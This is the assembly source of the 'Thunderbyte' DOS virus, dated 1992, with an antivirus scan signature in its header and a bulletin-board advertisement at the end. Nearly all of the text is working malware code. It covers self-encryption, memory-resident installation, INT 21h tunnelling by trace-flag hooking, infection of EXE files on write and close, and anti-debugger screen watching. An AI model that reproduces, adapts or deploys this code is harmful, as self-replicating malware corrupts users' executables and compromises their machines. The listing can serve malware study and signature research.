home *** CD-ROM | disk | FTP | other *** search
- ;*****************************************************************************;
- ; ;
- ; Tunderbyte Virus ;
- ; ;
- ; TBSCAN.DAT : DB3F00807609??4D75F9 ;
- ; ;
- ;*****************************************************************************;
-
- virus segment public 'code'
- assume cs:virus, ds:virus, es:virus
- org 0
-
- VirusStart equ $
- VirusSize1 equ (VirusEnd1-$)
- VirusSize2 equ (VirusEnd2-$)
-
- Decrypt1: db 0bdh,StartEncrypt-Decrypt2,0
- db 80h,76h,Decrypt2-VirusStart-1,0
- db 4dh,75h,-7
- Decrypt2: cli
- mov sp,offset DoAgain-2
- ret -8
-
- db 0,0,0,0,'***** THUNDERBYTE *****',0,0,0,0
-
- Init: mov cx,(VirusEnd1-StartEncrypt+1)/2
- mov dl,byte ptr cs:Decrypt1[6]
- mov dh,dl
- mov si,offset StartEncrypt
- NotReady: ret 2
-
- DecryptWord: mov ax,ss:[si]
- xor cs:[si],dx
- NextWord: add dx,ax
- inc si
- ret -4
-
- dw DecryptWord
- dw DoAgain
- dw NextWord
- dw Init
- DoAgain: loop NotReady
-
- StartEncrypt equ $
-
- Main: mov sp,1000h
- sti
- push ds
- push es
- mov ax,03031h
- mov bx,0DEADh
- int 21h
- cmp ax,0DEADh
- jne Install
- jmp Exit
- Install: push es
- mov ah,52h
- int 21h
- mov ax,es:[bx-2]
- mov cs:FirstMCB,ax
- pop es
- CheckBlock: mov ds,ax
- inc ax
- cmp word ptr ds:[1],ax
- jne NextBlock
- cmp word ptr ds:[3],((VirusSize2+0fh)/10h)+((VirusSize1+0fh)/10h)
- jne NextBlock
- push ax
- push es
- mov cx,VirusSize2
- xor di,di
- mov es,ax
- mov al,es:[di]
- cld
- repe scasb
- pop es
- pop ax
- je CopyVirus
- NextBlock: add ax,ds:[3]
- cmp byte ptr ds:[0],'Z'
- jne CheckBlock
- mov ah,4ah
- mov bx,-1
- int 21h
- mov ah,4ah
- sub bx,((VirusSize2+0fh)/10h)+((VirusSize1+0fh)/10h)+1
- int 21h
- mov ah,48h
- mov bx,((VirusSize2+0fh)/10h)+((VirusSize1+0fh)/10h)
- int 21h
- CopyVirus: push cs
- pop ds
- dec ax
- mov es,ax
- inc ax
- mov es:[1],ax
- mov cx,8
- mov si,offset CommandStr
- mov di,cx
- cld
- rep movsb
- mov es,ax
- EncryptZero: inc byte ptr ds:Decrypt1[6]
- jz EncryptZero
- mov cx,VirusSize2
- xor si,si
- xor di,di
- cld
- rep movsb
- push es
- call ReturnFar
- xor ax,ax
- mov ds,ax
- cli
- mov ax,offset DebugWatch
- xchg ax,ds:[20h]
- mov cs:OldInt8o,ax
- mov ax,cs
- xchg ax,ds:[22h]
- mov cs:OldInt8s,ax
- sti
- push ds:[4]
- push ds:[6]
- mov word ptr ds:[4],offset Trace1
- mov word ptr ds:[6],cs
- pushf
- push cs
- mov ax,offset Return4
- push ax
- cli
- pushf
- pop ax
- or ax,100h
- push ax
- push ds:[86h]
- push ds:[84h]
- mov ah,52h
- Trace1: push bp
- mov bp,sp
- push ax
- push ds
- push cs
- pop ds
- mov ax,FirstMCB
- cmp [bp+4],ax
- jae Return1
- mov ax,[bp-2]
- mov RegAX,ax
- mov RegSP,bp
- mov ax,[bp+2]
- mov OldInt21o,ax
- mov ax,[bp+4]
- mov OldInt21s,ax
- xor ax,ax
- mov ds,ax
- mov word ptr ds:[4],offset Trace2
- mov word ptr ds:[6],cs
- jmp short Trace3
- Return1: jmp short Return3
- Trace2: push bp
- mov bp,sp
- push ax
- push ds
- cmp ax,cs:RegAX
- jne Return3
- cmp bp,cs:RegSP
- jne Return3
- Trace3: push bx
- push dx
- lds bx,[bp+2]
- mov al,[bx]
- mov dx,[bx+1]
- inc dx
- cmp al,0e9h
- je JumpOpcode
- cmp al,0e8h
- je CallOpcode
- xchg ax,dx
- dec ax
- cbw
- xchg ax,dx
- cmp al,0ebh
- je JumpOpcode
- cmp al,70h
- jb Return2
- cmp al,7fh
- ja Return2
- JumpOpcode: push ax
- push ds
- xor ax,ax
- mov ds,ax
- mov word ptr ds:[0c8h],offset HackJump
- mov word ptr ds:[0cah],cs
- jmp short Continue
- CallOpcode: push ax
- push ds
- xor ax,ax
- mov ds,ax
- mov word ptr ds:[0c8h],offset HackCall
- mov word ptr ds:[0cah],cs
- Continue: pop ds
- pop ax
- mov cs:Displacement,dx
- mov cs:Opcode,al
- mov ax,32cdh
- xchg ax,[bx]
- mov cs:SavedCode,ax
- mov cs:HackOffset,bx
- mov cs:HackSegment,ds
- and word ptr [bp+6],0feffh
- Return2: pop dx
- pop bx
- Return3: pop ds
- pop ax
- pop bp
- iret
- Return4: pop ds:[6]
- pop ds:[4]
- mov cs:Handle,0
- Exit: pop es
- pop ds
- mov ax,ds
- add ax,10h
- add cs:OldCS,ax
- add ax,cs:OldSP
- mov dx,cs:OldSP
- cli
- mov ss,ax
- mov sp,dx
- sti
- jmp cs:OldEntry
-
- ReturnFar: retf
-
- OldEntry equ this dword
- OldIP dw 0
- OldCS dw -10h
- OldSP dw 1000h
- OldSS dw 0
-
- HackAddress equ this dword
- HackOffset dw ?
- HackSegment dw ?
- SavedCode dw ?
-
- HackJump: call Interrupt21
- push bp ; simulate a conditional or
- push ax ; unconditional jump
- mov bp,sp
- mov ax,[bp+8]
- and ax,0fcffh
- push ax
- db 0b8h ; mov ax,????
- Displacement dw 0
- popf
- Opcode db 0ebh,3,0 ; j?? +3
- xor ax,ax
- nop
- add [bp+4],ax
- pop ax
- pop bp
- iret
-
- HackCall: call Interrupt21
- sub sp,2 ; simulate a call
- push bp
- mov bp,sp
- push ax
- mov ax,[bp+4]
- inc ax
- xchg ax,[bp+8]
- xchg ax,[bp+6]
- xchg ax,[bp+4]
- add ax,cs:Displacement
- mov [bp+2],ax
- pop ax
- pop bp
- iret
-
- Seek: mov ah,42h
- xor cx,cx
- xor dx,dx
-
- Dos: pushf
- db 9ah
- OldInt21o dw ?
- OldInt21s dw ?
- ret
-
- DosVersion: cmp ax,3031h
- jne NotTByte
- cmp bx,0DEADh
- jne NotTByte
- mov ax,0DEADh
- add sp,8
- iret
-
- Interrupt21: cmp ah,30h
- je DosVersion
- push si
- push ds
- push cs:SavedCode
- lds si,cs:HackAddress
- pop ds:[si]
- pop ds
- pop si
- push ax
- push bx
- push cx
- push dx
- push si
- push di
- push bp
- push ds
- push es
- cmp ah,3eh
- je CloseFile
- cmp ah,40h
- je WriteFile
- Old21: pop es
- pop ds
- pop bp
- pop di
- pop si
- pop dx
- pop cx
- pop bx
- pop ax
- push si
- push ds
- lds si,cs:HackAddress
- mov word ptr ds:[si],32cdh
- pop ds
- pop si
- NotTByte: ret
-
- WriteFile: mov ax,4400h
- call Dos
- cmp dl,7fh
- ja Error1
- mov al,1
- call Seek
- jc Error1
- or dx,dx
- jnz Error1
- cmp ax,17h
- ja Error1
- push cs
- pop es
- mov si,dx
- mov di,offset Signature
- add di,ax
- cmp word ptr [si],"ZM"
- jne Error1
- cmp word ptr [si+12h],0DEADh
- je Error1
- cmp cx,18h
- jb CheckHandle
- or ax,ax
- jz Ok
- CheckHandle: cmp bx,cs:Handle
- jne Error1
- Ok: add cx,ax
- cmp cx,18h
- jbe CountOk
- mov cx,18h
- CountOk: sub cx,ax
- jbe Error1
- cld
- rep movsb
- mov cs:Handle,bx
- Error1: jmp Old21
-
- CloseFile: push cs
- pop ds
- push cs
- pop es
- mov ax,4400h
- call Dos
- test dl,80h
- jne Error1
- or bx,bx
- je Read
- cmp cs:Handle,bx
- je DoNotRead
- Read: xor al,al
- call Seek
- jc Error1
- mov ah,3fh
- mov cx,18h
- mov dx,offset Signature
- call Dos
- jc Error1
- DoNotRead: mov cs:Handle,0
- cmp Signature,"ZM"
- jne Error1
- cmp ChkSum,0DEADh
- je Error1
- mov ax,ExeIP
- mov OldIP,ax
- mov ax,ExeCS
- mov OldCS,ax
- mov ax,ExeSS
- mov OldSS,ax
- mov ax,ExeSP
- mov OldSP,ax
- mov al,2
- call Seek
- jc Error1
- push ax
- push dx
- mov cx,200h
- div cx
- cmp PartPage,dx
- jne SizeError
- add dx,-1
- adc ax,0
- cmp PageCount,ax
- SizeError: pop dx
- pop ax
- jne Error2
- add ax,0fh
- adc dx,0
- and ax,0fff0h
- mov cx,dx
- mov dx,ax
- mov ax,4200h
- call Dos
- jnc SeekOk
- Error2: jmp Old21
- SeekOk: mov cx,10h
- div cx
- sub ax,HdrSize
- mov ExeCS,ax
- mov ExeIP,offset Decrypt1
- mov ExeSS,ax
- mov ExeSP,VirusSize1+400h
- cmp MinMem,40h
- jae MemoryOk
- mov MinMem,40h
- cmp MaxMem,40h
- jae MemoryOk
- mov MaxMem,40h
- MemoryOk: push ds
- push es
- mov ax,cs
- mov ds,ax
- add ax,(VirusSize2+0fh)/10h
- mov es,ax
- mov cx,VirusSize1
- xor si,si
- xor di,di
- cld
- rep movsb
- mov ds,ax
- mov cx,offset StartEncrypt-Decrypt2
- mov dl,byte ptr ds:Decrypt1[6]
- mov si,offset StartEncrypt-1
- Again1: xor ds:[si],dl
- dec si
- loop Again1
- mov cx,(VirusEnd1-StartEncrypt+1)/2
- mov dh,dl
- mov si,offset StartEncrypt
- Again2: xor ds:[si],dx
- mov ax,ds:[si]
- add dx,ax
- inc si
- add dx,ax
- inc si
- loop Again2
- mov ah,40h
- mov cx,VirusSize1
- xor dx,dx
- call Dos
- pop ds
- pop es
- jc Error3
- mov al,2
- call Seek
- jc Error3
- mov cx,200h
- div cx
- mov PartPage,dx
- add dx,-1
- adc ax,0
- mov PageCount,ax
- mov ChkSum,0DEADh
- xor al,al
- call Seek
- jc Error3
- mov ah,40h
- mov cx,18h
- mov dx,offset Signature
- call Dos
- Error3: jmp Old21
-
- Count dw 8
- DebugStr db 'DEBUG'
- CommandStr db 'COMMAND '
-
- DebugWatch: push ax
- push cx
- push dx
- push si
- push di
- push ds
- push es
- dec cs:Count
- jnz EndWatch
- mov cs:Count,8
- mov ax,0b000h
- mov ds,ax
- mov cx,2
- push cs
- pop es
- cld
- NextScreen: push cx
- mov cx,2000
- xor si,si
- mov di,offset DebugStr
- NextChar1: mov dx,5
- NextChar2: lodsb
- inc si
- and al,0dfh
- scasb
- jne CharOk
- dec dx
- jnz NextChar2
- Alarm: pop cx
- lds si,cs:HackAddress
- cmp byte ptr ds:[si],0cdh
- jne EndWatch
- mov ax,cs:SavedCode
- mov ds:[si],ax
- xor cx,cx
- mov ds,cx
- mov ax,cs:OldInt8o
- mov ds:[20h],ax
- mov ax,cs:OldInt8s
- mov ds:[22h],ax
- mov es,cx
- push cs
- pop ds
- mov cx,14
- mov si,offset EndWatch-2
- mov di,4f0h
- push es
- push di
- rep movsb
- xor di,di
- mov cx,VirusSize2
- push cs
- pop es
- retf
- CharOk: neg dx
- add dx,5
- sbb di,dx
- sub si,dx
- sub si,dx
- loop NextChar1
- ScreenOk: mov ax,ds
- add ax,800h
- mov ds,ax
- pop cx
- loop NextScreen
- jmp short EndWatch
- rep stosb
- EndWatch: pop es
- pop ds
- pop di
- pop si
- pop dx
- pop cx
- pop ax
- db 0eah
- OldInt8o dw ?
- OldInt8s dw ?
-
- db '***** (C) COPYRIGHT 1992 BY THE WRITER *****'
-
- VirusEnd1 equ $
-
- FirstMCB dw ?
- RegAX dw ?
- RegSP dw ?
-
- Handle dw ?
- Signature dw ?
- PartPage dw ?
- PageCount dw ?
- ReloCnt dw ?
- HdrSize dw ?
- MinMem dw ?
- MaxMem dw ?
- ExeSS dw ?
- ExeSP dw ?
- ChkSum dw ?
- ExeIP dw ?
- ExeCS dw ?
-
- VirusEnd2 equ $
-
- virus ends
-
- end Main
- �
- ;─────────────────────────────────────────────────────────────────────────;
- ;──────────────────> and Remember Don't Forget to Call <──────────────────;
- ;────────────> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <──────────;
- ;─────────────────────────────────────────────────────────────────────────;
-
-
